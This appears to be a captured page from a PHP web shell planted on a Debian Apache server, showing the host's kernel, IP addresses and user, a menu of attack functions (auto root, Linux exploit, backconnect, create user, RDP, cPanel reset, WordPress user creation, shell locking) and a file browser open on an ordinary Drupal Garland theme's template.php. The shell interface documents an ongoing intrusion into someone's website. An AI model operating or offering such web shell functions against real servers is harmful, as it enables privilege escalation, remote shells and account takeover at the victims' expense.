Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.137.187.104
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
themes /
garland /
[ HOME SHELL ]
Name
Size
Permission
Action
color
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
comment.tpl.php
814
B
-rw-r--r--
fix-ie-rtl.css
1.13
KB
-rw-r--r--
fix-ie.css
1.29
KB
-rw-r--r--
garland.info
409
B
-rw-r--r--
logo.png
5
KB
-rw-r--r--
maintenance-page.tpl.php
2.68
KB
-rw-r--r--
node.tpl.php
992
B
-rw-r--r--
page.tpl.php
2.85
KB
-rw-r--r--
print.css
1.02
KB
-rw-r--r--
screenshot.png
10.69
KB
-rw-r--r--
style-rtl.css
4.85
KB
-rw-r--r--
style.css
20.3
KB
-rw-r--r--
template.php
4.35
KB
-rw-r--r--
theme-settings.php
753
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : template.php
<?php /** * Override of theme_breadcrumb(). */ function garland_breadcrumb($variables) { $breadcrumb = $variables['breadcrumb']; if (!empty($breadcrumb)) { // Provide a navigational heading to give context for breadcrumb links to // screen-reader users. Make the heading invisible with .element-invisible. $output = '<h2 class="element-invisible">' . t('You are here') . '</h2>'; $output .= '<div class="breadcrumb">' . implode(' › ', $breadcrumb) . '</div>'; return $output; } } /** * Override or insert variables into the maintenance page template. */ function garland_preprocess_maintenance_page(&$vars) { // While markup for normal pages is split into page.tpl.php and html.tpl.php, // the markup for the maintenance page is all in the single // maintenance-page.tpl.php template. So, to have what's done in // garland_preprocess_html() also happen on the maintenance page, it has to be // called here. garland_preprocess_html($vars); } /** * Override or insert variables into the html template. */ function garland_preprocess_html(&$vars) { // Toggle fixed or fluid width. if (theme_get_setting('garland_width') == 'fluid') { $vars['classes_array'][] = 'fluid-width'; } // Add conditional CSS for IE6. drupal_add_css(path_to_theme() . '/fix-ie.css', array('group' => CSS_THEME, 'browsers' => array('IE' => 'lt IE 7', '!IE' => FALSE), 'preprocess' => FALSE)); } /** * Override or insert variables into the html template. */ function garland_process_html(&$vars) { // Hook into color.module if (module_exists('color')) { _color_html_alter($vars); } } /** * Override or insert variables into the page template. */ function garland_preprocess_page(&$vars) { // Move secondary tabs into a separate variable. $vars['tabs2'] = array( '#theme' => 'menu_local_tasks', '#secondary' => $vars['tabs']['#secondary'], ); unset($vars['tabs']['#secondary']); if (isset($vars['main_menu'])) { $vars['primary_nav'] = theme('links__system_main_menu', array( 'links' => $vars['main_menu'], 'attributes' => array( 'class' => array('links', 'inline', 'main-menu'), ), 'heading' => array( 'text' => t('Main menu'), 'level' => 'h2', 'class' => array('element-invisible'), ) )); } else { $vars['primary_nav'] = FALSE; } if (isset($vars['secondary_menu'])) { $vars['secondary_nav'] = theme('links__system_secondary_menu', array( 'links' => $vars['secondary_menu'], 'attributes' => array( 'class' => array('links', 'inline', 'secondary-menu'), ), 'heading' => array( 'text' => t('Secondary menu'), 'level' => 'h2', 'class' => array('element-invisible'), ) )); } else { $vars['secondary_nav'] = FALSE; } // Prepare header. $site_fields = array(); if (!empty($vars['site_name'])) { $site_fields[] = $vars['site_name']; } if (!empty($vars['site_slogan'])) { $site_fields[] = $vars['site_slogan']; } $vars['site_title'] = implode(' ', $site_fields); if (!empty($site_fields)) { $site_fields[0] = '<span>' . $site_fields[0] . '</span>'; } $vars['site_html'] = implode(' ', $site_fields); // Set a variable for the site name title and logo alt attributes text. $slogan_text = $vars['site_slogan']; $site_name_text = $vars['site_name']; $vars['site_name_and_slogan'] = $site_name_text . ' ' . $slogan_text; } /** * Override or insert variables into the node template. */ function garland_preprocess_node(&$vars) { $vars['submitted'] = $vars['date'] . ' — ' . $vars['name']; } /** * Override or insert variables into the comment template. */ function garland_preprocess_comment(&$vars) { $vars['submitted'] = $vars['created'] . ' — ' . $vars['author']; } /** * Override or insert variables into the block template. */ function garland_preprocess_block(&$vars) { $vars['title_attributes_array']['class'][] = 'title'; $vars['classes_array'][] = 'clearfix'; } /** * Override or insert variables into the page template. */ function garland_process_page(&$vars) { // Hook into color.module if (module_exists('color')) { _color_page_alter($vars); } } /** * Override or insert variables into the region template. */ function garland_preprocess_region(&$vars) { if ($vars['region'] == 'header') { $vars['classes_array'][] = 'clearfix'; } }
Close